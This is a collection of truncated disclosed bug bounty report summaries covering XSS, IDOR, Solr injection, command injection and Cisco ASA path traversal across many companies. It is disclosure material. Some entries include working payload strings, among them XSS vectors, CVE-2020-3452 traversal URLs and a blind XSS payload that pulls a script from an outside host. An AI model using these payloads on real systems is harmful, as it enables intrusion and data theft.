Uber: Critical Information disclosure of rtapi token for any user via https://video-support-staging.uber.com/video/api/getPopulousUser

The researcher has identified that the API endpoint can be leveraged to return a sensitivetoken that can be leveraged for access to rtapi endpoints. As example change x-uber-token value with the following found code:...

Automattic: [api.tumblr.com] Exploiting clickjacking vulnerability to trigger self DOM-based XSS

Hello i have found a clickjacking vulnerability in https://api.tumblr.com/console/ And a self DOM-based XSS In https://api.tumblr.com/console/calls/user/follow/unfollow A attacker can exploit the clickjacking to trigged the self DOM-based XSS Vulnerable URL to clickjacking :...

PortSwigger Web Security: SMTP interaction theft via MITM

See http://www.postfix.org/CVE-2011-0411.html for adetailled description. Impact MitM could obtain user credentials...

Zomato: [api.zomato.com] Abusing LocalParams (city_id) to Inject SOLR query

Disclosing it as per the request from @zzzhacker13. This report is identical to 844428 but this one was on a different endpoint. POC - - :v2/red/homepage.json?lat=&lon=&cityid=!dismax+df=cityid86&androidcountry=US&lang=en&androidlanguage=en Zomato Security Team...

Shopify: Ability to publish a paid theme without purchasing it.

Hi, Description I kept looking for alternatives to my report 927567 and I found another way to publish a paid theme without having to purchase it. This time the trick is to send "ThemePublishLegacy" XHR request while the theme is being installed. Requirements 1. Google Chrome suggested because...

TikTok: Multiple Cross-Site Scripting vulnerability via the language parameter

A cross site scripting vulnerability was reported across multiple TikTok domains leveraging the language parameter. This issue has been promptly resolved. We thank @luizviana for reporting this to our team and confirming the resolution...

TikTok: Cross Site Scripting using Email parameter in Ads endpoint 1

A cross site scripting vulnerability was found in the ads endpoint using the email parameter. This issue has been resolved. We thank @luizviana for reporting this to our team and confirming the resolution...

Mail.ru: Stored XSS in history on [corporate.city-mobil.ru]

Stored XSS in view history functionality on corporate.city-mobil.ru...

Kubernetes: CVE-2019-11250 remains in effect.

Report Submission Form Summary: "CVE-2019-11250: TOB-K8S-001: Bearer tokens are revealed in logs" remains in effect. Kubernetes Version: Effects at least all versions since 1.4. - This was determined with some git archaeology. This was determined by following the code snippet from it's current...

Zomato: Solr Injection in `user_id` parameter at :/v2/leaderboard_v2.json

@zzzhacker13 identified a Solr Injection on the userid parameter at :/v2/leaderboardv2.json. Our team analyzed internally and found that only fq=injection was possible on the Solr endpoint, hence the Solr injection was of low impact since there was no way to escalate it to exfiltrate data, one...

Nextcloud: Possible denial of service when entering a loooong password

You can create a very long password until you get the last user to put and aries or DoS. Normally passwords have 8-10-24 digits. By sending a very long password 1.000.000 characters Usually this problem is caused by a vulnerable password hashing implementation. When a long password is sent, the...

Mail.ru: Ability to edit the address of any company by its id on [corporate.city-mobil.ru]

IDOR vulnerability in corporate.city-mobil.ru interface allowed to edit the address of any company...

Acronis: Subdomain Takeover – jet.acronis.com pointing to unclaimed Webflow services

Hi Team, Greetings! I've come across jet.acronis.com of acronis.com pointing to an unclaimed Webflow service. Visiting the jet.acronis.com returned the default 404 page for Webflow service, thereby making it potential for subdomain takeover. F937948 jet.acronis.com CNAME pointed to...

LY Corporation: Deleting someone else's profile image with a GraphQL query in programming education service (https://entry.line.me)

LINE entry is a service that provides programming education for children https://entry.line.me. LINE entry provides users with the ability to add profile images. It was possible to delete other people's profile images or thumbnails using a GraphQL query...

Shopify: Admin web sessions remain active after logout of Shopify ID

previously on 837729 a session is still valid and the store password can be seen. this time I report that the session is still valid despite changing the email address on the shopify account. summary: accounts that have changed email addresses still have permission to enter the store through...

██████: Android: Explanation of Access to app protected components vulnerability

████████████████████████████...

Hyperledger: Vulnerabilities in Endorsement Mechanism of Private Data Related Transactions in Hyperledger Fabric 2.0

To whom it may concern, We report design flaws that can be exploited by private data collection non-member organizations to forge endorsements of read-related transactions and return fake values to a user. When a user issues a read-only transaction proposal to a endorser in the private data...

U.S. Dept Of Defense: [CVE-2020-3452] Unauthenticated file read in Cisco ASA

Hey, I found out that host ████████.mil was vulnerable to CVE-2020-3452. You can test it by visiting the URL: https://██████████.mil/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portalinc.lua To try it with CURL please run the following command:...

U.S. Dept Of Defense: CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower.

Summary: The affected IP: █████ Here is POC of CVE-2020-3452, unauthenticated file read in Cisco ASA & Cisco Firepower. For example to read "/+CSCOE+/portalinc.lua" file. for example: ████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portalinc.lua&default-language&lang=../ Suggested...

Node.js third-party modules: [m-server] XSS reflected because path does not escapeHtml

I would like to report XSS in m-server It allows attacker can perform XSS in client side Module module name: m-server version: 1.4.2 npm page: https://www.npmjs.com/package/m-server Module Description M-Server is a mini http static server that without any dependencies; Module Stats 1 weekly...

Automattic: Site-wide CSRF at Atavist

Summary: Hi team, I have a Atavist Magazine account. And there are no CSRF tokens on account settings. For example ; - When changing email there is a user ID but they are sequential : F936597 - Deleting credit card : F936618 - Cancelling subscription :...

Node.js third-party modules: [freespace] Command Injection due to Lack of Sanitization

I would like to report Command Injection in the freespace module. It allows an attacker to inject and execute shell commands on Unix based systems. Module module name: freespace version: 1.0.4 npm page: https://www.npmjs.com/package/freespace Module Description A library that tells you how much...

Automattic: Can buy Atavist Magazine subscription for free

Summary: Hi team If you go to https://magazine.atavist.com/ and scroll down. You will see membership price is $25, but I found a way to buy this subscription for free via Gift feature. When you send gift request before adding any credit card to your account you will see this response : F936531...

Mail.ru: Public access to Sidekiq dashboard at shopper.sbermarket.ru

Anonymous access to Sidekiq process dashboard was available on shopper.sbermarket.ru...

Automattic: IDOR when editing email leads to Account Takeover on Atavist

Summary: Hi team, I created an account on Atavist and checked my settings page. I can change my email at https://magazine.atavist.com/cms/reader/account with this request : F936117 And as you can see, there is a id parameter on request data. It's our user ID, and it's vulnerable for IDOR. So we c...

QIWI: [z.tochka.com] Unlimited file uploads lead to malware executed

Привет Нашел File Upload при загрузке изображения в чате поддержки банка Малварь загружается на z.tochka.com а значит он доверен 1. Заходим в чат 2. Загружаем малварь, можем его закриптовать, или просто загрузить .bat файл который будет выполнять какие либо действия на устройствах сотрудников 3...

Automattic: Reflected XSS at /category/ on a Atavis theme

Summary: Hi team, This report is similar to 947790 You fixed the XSS on search, but I found another XSS at /category/xsspayload For PoC you can check these URLs : https://magazine.atavist.com/category/%22%3E%3Csvg%20onload%3Dalert%60XSS%60%3E...

U.S. Dept Of Defense: Reflected XSS in https://www.█████/

Hello Security Team, I would like to report the XSS vulnerability on your system. Steps To Reproduce: Visit the following POC link and move your mouse allover index page: https://www.████/Z%22onmouseover=alert%60%60%20%22/████████/█████.aspx 1. Tested on firefox browser: ███████ 2.Tested on googl...

Mail.ru: Possible access to the car's photo and registration by its ID on [fleet.city-mobil.ru]

Car / driver's license photo cropped with built-in photo editor of fleet.city-mobil.ru could get a predictable name...

Mail.ru: Disclosure of personal support email addresses on 'support-fleet.city-mobil.ru'

IDOR vulnerability in support-fleet.city-mobil.ru allowed to disclose the support staff e-mail addresses...

Zomato: Lack of Password Confirmation for Account Deletion

Description: Issue in the zomato android application is that the user account can be deleted without confirming user password or re authentication. The removal of account is one of the sensitive part of any application that needs to protect, therefore removing an account should validate the...

Internet Bug Bounty: Use after free vulnerability in phar_parse_zipfile

Malformed phar file with cache configuration leads freed memory as hash key when it inserts into the hash table. More detail information and original report is here: https://bugs.php.net/bug.php?id=79797 and it was assigned CVE-2020-7068. Impact Through this vulnerability that inserts freed memor...

Mail.ru: HTML Injection at "city-mobil.ru"

HTML Injection in city-mobil.ru on driver recruitment page...

Node.js third-party modules: [@knutkirkhorn/free-space] - Command Injection through Lack of Sanitization

I would like to report Command Injection in the free-space module. It allows arbitrary shell command execution on Unix-based systems Module module name: free-space version: 1.2.0 npm page: https://www.npmjs.com/package/free-space Module Description Get the amount of free space for a drive Module...

GitLab: Store-XSS in error message of build-dependencies

Hi, A stored-XSS is existing in error message of build-dependencies. Fortunately it currently does not exist in gitlab.com. It seems that gitlab.com disables the dependencies validation. However this feature is enable by default in self-managed installation. Steps to reproduce The following steps...

New Relic: HTML injection at Alert email

@wi11 discovered an issue with Alerts notification emails where supplied HTML tags would be rendered by the email generator. This could allow an attacker to embed arbitrary hyperlinks or images under the header in those Alerts emails. Some prople asked me about this bug, so I give a simple...

Bumble: XSS DI BIODATA

I did the injection with payload see mp4, I did the 1st and 2nd experiments. Sorry for the 1st experiment, I didn't video. When I did the first injection, there was an error after pressing the OK button. Impact the impact could have been someone who stole cookies...

Nextcloud: DoS attack against the client when entering a long password

Hi team, My report like this 840598 entering a long password the denial a service attack on the server please fix it .. Step .. 1. Create account on https://nextcloud.com/signup/ 2. enter password any password and login . 3. after you login go to your settings . 4. go to here...

Mail.ru: SECRET_KEY Of Django Leaked In maps.me

Token for a internal Jenkins account of maps.me was leaked via git commit...

Mail.ru: relap.io/admin/api - административный API доступен без аутентификации

Admin interface opened to external network without authentication on relap.io...

Mail.ru: [webvpn.city-srv.ru] Path traversal via CVE-2020-3452

CVE-2020-3452 on webvpn.city-srv.ru...

Ruby on Rails: XSS by file (Active Storage `Proxying`)

Hello, I've seen similar issues with 407319 and 429868 occur with Active Storage's new File serving strategies Proxying. Commit is https://github.com/rails/rails/commit/dfb5a82b259e134eac89784ac4ace0c44d1b4aee. ruby...

Automattic: DOM-Based XSS in tumblr.com

Description Hi, i would like to report DOM-Based XSS that it's exactly like this one 882546, this one work just because the page /reblog/ID/OTHERID doesn't have a correct CSP rule. Steps to reproduce 1. go to https://www.tumblr.com/reblog/620008931446652928/JBuEvzz5 2. click in click me 3. click ...

Valve: Shell command injection in https://partner.steamgames.com/admin/game/publish/ via screenshot URL

Shell command injection in https://partner.steamgames.com/admin/game/publish/ via screenshot URL The vulnerability allowed insufficient validation of parameters, which permitted the injection of shell metacharacters into values used to construct a Bash command...

Dropcontact: Unrestricted File Upload on https://app.dropcontact.io/app/upload/

hi team, I found Unrestricted File Upload Vulnerabilities on https://app.dropcontact.io/app/upload/. Steps To Reproduce: 1. Create an account in https://app.dropcontact.io/app/ 1. go to https://app.dropcontact.io/app/upload/ 1. try to upload html file , you will see message only : .csv, .txt, .xl...

Mail.ru: Information Disclosure

Performance metrics were available at instamart.ru...

Shopify: Blind Stored XSS Via Staff Name

Hey Team, I found blind stored XSS when i add staff name in https://your-store.myshopify.com/admin/settings/account Step to reproduce : 1. Go to https://your-store.myshopify.com/admin/settings/account 2. Add Staff Account 3. Fill First & Last Name with this payload "$.getScript"//█████████.xss.ht...

curl: Connect-only connections can use the wrong connection

Summary: If a connect-only easy handle is not read from or written to, its connection can time out and be closed. If a new connection is created it can be allocated at the same address, causing the easy handle to use the new connection. This new connection may not be connected to the same server ...

Mail.ru: В самокате можно просматривать и изменять данные любого заказа без авторизации

IDOR in smart.space API allowed to change orders and list items of order content...

Courier: Broken Authentication Session Token Bug

Hi Team Hope your are good I have found a broken authentication issue in https://www.trycourier.app Steps to reproduce 1. Create a courier account or use existing one. 2. Confirm Your email address. 3. Now log out from your account and request for password reset code for your account . 4. Don't u...